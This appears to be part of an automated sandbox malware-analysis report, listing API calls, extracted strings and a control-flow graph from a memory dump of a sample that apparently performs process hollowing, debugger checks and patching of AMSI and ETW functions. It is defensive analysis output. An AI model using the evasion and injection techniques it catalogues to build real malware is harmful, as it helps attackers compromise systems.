                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                • API String ID: 2719805696-3542721025
                                                                                                                                • Opcode ID: 61f90d15f39083d3f3f9233ff0ae3a007b7f2b4859fc63ea9a1f6ee1e7d7afb7
                                                                                                                                • Instruction ID: e879bb324796417049ffc87cfa848500dc1cd5df16fc76ff46cdad1e5d8e0ae0
                                                                                                                                • Opcode Fuzzy Hash: 61f90d15f39083d3f3f9233ff0ae3a007b7f2b4859fc63ea9a1f6ee1e7d7afb7
                                                                                                                                • Instruction Fuzzy Hash: D701C579680208AFEB01EF98ED81E9AB7EDFB49710F505890B904D7680DF34AD118F65
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02A186D5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                • API String ID: 3503870465-2520021413
                                                                                                                                • Opcode ID: eea43cb38eb3be1625e37796c707e3c124f978851f231115a48312681759710f
                                                                                                                                • Instruction ID: 7904beac6273da5b506ccc1067495408b4fc9f150b201f9a01f75cad2c9e01a5
                                                                                                                                • Opcode Fuzzy Hash: eea43cb38eb3be1625e37796c707e3c124f978851f231115a48312681759710f
                                                                                                                                • Instruction Fuzzy Hash: 00014F78A80204BFEB05EBA4ED91A5EB7AEFB4D750F5148A0F50097640DE38BD018A15
                                                                                                                                APIs
                                                                                                                                • RtlI.N(?,?,00000000,02A1DC7E), ref: 02A1DC2C
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC42
                                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Path$DeleteFileNameName_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4284456518-0
                                                                                                                                • Opcode ID: 481de8379264354905fd8123789f22b5993fc5e77d5fdc1df1d9e8bbf68ef942
                                                                                                                                • Instruction ID: 46176ed47d94d82c82f3507211821672236dacdc34c24cf292dacaa551948b3c
                                                                                                                                • Opcode Fuzzy Hash: 481de8379264354905fd8123789f22b5993fc5e77d5fdc1df1d9e8bbf68ef942
                                                                                                                                • Instruction Fuzzy Hash: F2016275988A087EEB05DBB0DE81FCD77BDBB44718F5148929301FA081DEB4AB048B24
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A04F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A04F2E
                                                                                                                                • RtlI.N(?,?,00000000,02A1DC7E), ref: 02A1DC2C
                                                                                                                                • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC42
                                                                                                                                • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC61
                                                                                                                                  • Part of subcall function 02A04C60: SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1530111750-0
                                                                                                                                • Opcode ID: e880bc63af2b495ba51dc86ba0bdb09b0a3febd13d55a03b39400b79d0c13005
                                                                                                                                • Instruction ID: 3fefe999275dc5ddb01aa0f1c5f4f8d8096d22a2794c4d114354a2a8ddd2b0e6
                                                                                                                                • Opcode Fuzzy Hash: e880bc63af2b495ba51dc86ba0bdb09b0a3febd13d55a03b39400b79d0c13005
                                                                                                                                • Instruction Fuzzy Hash: 6701F47198460CBEEB11EBA0DE82FCDB3BDEB48714F5144A1E701F6580EE746B048A64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A16D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02A16DB9,?,?,?,00000000), ref: 02A16D99
                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,02A16EAC,00000000,00000000,02A16E2B,?,00000000,02A16E9B), ref: 02A16E17
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromInstanceProg
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2151042543-0
                                                                                                                                • Opcode ID: 1f53af5818c713b7209c0596f3056ef9e8b6d019a054c207f166e2ba6a56d160
                                                                                                                                • Instruction ID: fd257d5b797ac069281d994f9e4e096ba4b6873851edc3bccfe6c288b4f6c39f
                                                                                                                                • Opcode Fuzzy Hash: 1f53af5818c713b7209c0596f3056ef9e8b6d019a054c207f166e2ba6a56d160
                                                                                                                                • Instruction Fuzzy Hash: 7B01DF31648B04AEEB11EF61DDA296BBBBDE749F20B510935F405E26C0EE319910CC60
                                                                                                                                APIs
                                                                                                                                • InetIsOffline.URL(00000000,00000000,02A2B784,?,?,?,00000000,00000000), ref: 02A1F801
                                                                                                                                  • Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA
                                                                                                                                  • Part of subcall function 02A1F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02A1FAEB,UacInitialize,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,Initialize), ref: 02A1F6EE
                                                                                                                                  • Part of subcall function 02A1F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A1F700
                                                                                                                                  • Part of subcall function 02A1F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02A1F754
                                                                                                                                  • Part of subcall function 02A1F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A1F766
                                                                                                                                  • Part of subcall function 02A1F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A1F77D
                                                                                                                                  • Part of subcall function 02A07E5C: GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67
                                                                                                                                  • Part of subcall function 02A0C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B7B8B8,?,02A20751,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession), ref: 02A0C37B
                                                                                                                                  • Part of subcall function 02A1DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDAB
                                                                                                                                  • Part of subcall function 02A1DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDDB
                                                                                                                                  • Part of subcall function 02A1DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A1DDF0
                                                                                                                                  • Part of subcall function 02A1DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A1DE1C
                                                                                                                                  • Part of subcall function 02A1DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A1DE25
                                                                                                                                  • Part of subcall function 02A07E80: GetFileAttributesA.KERNEL32(00000000,?,02A2356F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,Initialize), ref: 02A07E8B
                                                                                                                                  • Part of subcall function 02A08048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02A2370D,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,Initialize,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8), ref: 02A08055
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                                                                                • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                • API String ID: 297057983-2644593349
                                                                                                                                • Opcode ID: eb0f1fba6f72aa69e916189aee71f20576d8f4858a5401141ae4beef334ed409
                                                                                                                                • Instruction ID: 5a85805e86447e95154c2d926ac79f23b680c2c2a2ae64be210edb64a4807b92
                                                                                                                                • Opcode Fuzzy Hash: eb0f1fba6f72aa69e916189aee71f20576d8f4858a5401141ae4beef334ed409
                                                                                                                                • Instruction Fuzzy Hash: 9B14FB34A8016CDBDB10EB64EEC0ADE73BAFF89304F5045E69509AB294DE30AE55CF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 4574 2a28128-2a28517 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a048ec 4689 2a293a1-2a29524 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a048ec 4574->4689 4690 2a2851d-2a286f0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a047ec call 2a049a0 call 2a04d74 call 2a04df0 CreateProcessAsUserW 4574->4690 4779 2a29cf5-2a2b2fa call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 * 16 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a17c10 call 2a18338 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 ExitProcess 4689->4779 4780 2a2952a-2a29539 call 2a048ec 4689->4780 4799 2a286f2-2a28769 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 4690->4799 4800 2a2876e-2a28879 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 4690->4800 4780->4779 4788 2a2953f-2a29812 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1f094 call 2a04860 call 2a049a0 call 2a046d4 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a07e5c 4780->4788 5046 2a29818-2a29aea call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1e358 call 2a04530 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04de0 * 2 call 2a04764 call 2a1dc8c 4788->5046 5047 2a29aef-2a29cf0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a049f8 call 2a18d70 4788->5047 4799->4800 4900 2a28880-2a28ba0 call 2a049f8 call 2a1de50 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a1d164 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 4800->4900 4901 2a2887b-2a2887e 4800->4901 5217 2a28ba2-2a28bb4 call 2a18730 4900->5217 5218 2a28bb9-2a2939c call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 ResumeThread call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 CloseHandle call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a18080 call 2a1894c * 6 CloseHandle call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 4900->5218 4901->4900 5046->5047 5047->4779 5217->5218 5218->4689
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA
                                                                                                                                • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02B7B7E0,02B7B824,OpenSession,02A87380,02A2B7B8,UacScan,02A87380), ref: 02A286E9
